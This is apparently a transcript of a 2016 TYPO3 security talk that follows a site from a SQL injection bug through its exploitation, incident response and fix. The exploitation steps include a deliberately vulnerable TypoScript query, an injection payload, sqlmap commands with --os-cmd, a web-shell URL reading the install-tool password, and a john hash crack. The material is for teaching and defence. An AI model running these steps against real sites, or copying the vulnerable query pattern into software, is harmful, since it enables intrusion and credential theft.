Diary of a Hack
TRANSCRIPT
Inspiring people to share
Diary of a Hack
Vulnerabilities and Attacks
Helmut Hummel <[email protected]>
22.04.2016
Vulnerabilities and Exploits
@helhum
Security
Day 1 - Implementing a feature
lib.sqliSimple = CONTENT
lib.sqliSimple {
  table = tt_content
  select.where.wrap = colPos=|
  select.where.data = GP:colPos
}
lib.sqliSearch = CONTENT
lib.sqliSearch {
  table = tt_content
  select.where.wrap = header like '%|%'
  select.where.data = GP:search
}
Day 2 - Testing the feature
'BE/debug' => '1'
'FE/debug' => '1'
'SYS/devIPmask' => '*'
'SYS/displayErrors' => '1'
'SYS/sqlDebug' => '1'
'SYS/exceptionalErrors' => '28674'
'DB/username' => 'root'
Day 3 - Distraction
Day 4 - Attraction
https://www.google.de/?q=exec_SELECTquery+%22You+have+an+error+in+your+SQL+syntax%22
Day 5 - Exploitation
Excursion - SQLi
SELECT * FROM tt_content WHERE colPos = 0
'SELECT * FROM tt_content WHERE colPos = ' . $_GET['colPos']
'SELECT * FROM tt_content WHERE colPos = 0 or hidden = 1'
$_GET['colPos']
Disclaimer
Don't do this at home!
(unless you have written permission)
$ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p 'colPos'
GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
The power of MySQL
$ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p 'colPos' \
    --os-cmd='ls -al'
http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL
http://security.dev/typo3/sysext/install/Start/Install.php
http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword%20typo3conf/LocalConfiguration.php
$ john pw
Loaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5])
password         (dummy)
guesses: 1  time: 0:00:00:01 DONE (Thu Jun 4 11:00:44 2015)  c/s: 900  trying: 123456 - fishing
Day 5 - Discovery
Discovery
• Take site offline!
• seriously
• I mean it
Day 6 - Analysis
Analysis
• Make a backup of current state (files, DB, logs)
• Search all logs for "suspicious" entries
• Find point of entry (security issue)
• If in doubt: get help
Day 7 - Fix
lib.sqliSimple = CONTENT
lib.sqliSimple {
  table = tt_content
  select.where = colPos=###colPos###
  select.markers {
    colPos.data = GP:colPos
  }
}
lib.sqliSearch = CONTENT
lib.sqliSearch {
  table = tt_content
  select.where = header like ###search###
  select.markers {
    search.data = GP:search
    search.wrap = %|%
  }
}
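The Day 1 wrap variants and the Day 7 marker variants, rebuilt as an added example in Python against an in-memory SQLite table (this is not code from the talk or from TYPO3; the rows, table layout and function names are constructed for illustration). It shows the query text changing under the wrap form and staying fixed under the bound form, including the %|% wrap being applied to the value rather than to the SQL.

```python
import sqlite3

# Constructed sample rows standing in for TYPO3's tt_content table.
ROWS = [
    (1, 0, "Welcome", 0),
    (2, 1, "Sidebar", 0),
    (3, 1, "Internal draft", 1),
]


def make_db():
    """Build the constructed tt_content table in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tt_content (uid INTEGER, colPos INTEGER, header TEXT, hidden INTEGER)"
    )
    conn.executemany("INSERT INTO tt_content VALUES (?, ?, ?, ?)", ROWS)
    return conn


def uids_wrap(conn, col_pos):
    """Day 1: select.where.wrap = colPos=| pastes GP:colPos into the SQL text,
    so whatever the request carries becomes part of the query."""
    sql = "SELECT uid FROM tt_content WHERE colPos = " + col_pos + " ORDER BY uid"
    return [row[0] for row in conn.execute(sql)]


def uids_marker(conn, col_pos):
    """Day 7: select.where = colPos=###colPos### with a marker; the value is
    bound as data, so it is compared against the column, never parsed as SQL."""
    sql = "SELECT uid FROM tt_content WHERE colPos = ? ORDER BY uid"
    return [row[0] for row in conn.execute(sql, (col_pos,))]


def uids_search_marker(conn, search):
    """Day 7 search: search.wrap = %|% adds the LIKE wildcards to the bound
    value; the query text itself stays constant."""
    sql = "SELECT uid FROM tt_content WHERE header LIKE ? ORDER BY uid"
    return [row[0] for row in conn.execute(sql, ("%" + search + "%",))]
```

With the talk's input "0 or hidden = 1", uids_wrap returns the hidden row as well, while uids_marker treats the whole string as one value and matches nothing.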
Fix
• Close security issue in Code/ Extension/ Core
• Restore from backup
• Or if you really know what you are doing: cleanup installation
• Go online again
• Plan improvements (education, monitoring, …)
Day 8 - Improve
Lessons learned
• Development/ Testing Environment
• Deploy to Production
• Least privilege
• There is no Software without bugs. Be prepared!
Best Practice
• Operations
  • Regular updates
  • Backups
  • Monitoring
• Development
  • Peer Reviews (TypoScript, Code, Templates)
  • (automated) Tests
• Focus
• Education
• Allocate time for all of the above
Questions?
Resources
• http://docs.typo3.org/typo3cms/SecurityGuide/
• http://sqlmap.org
• http://www.openwall.com/john/
• https://www.owasp.org/
Thank you!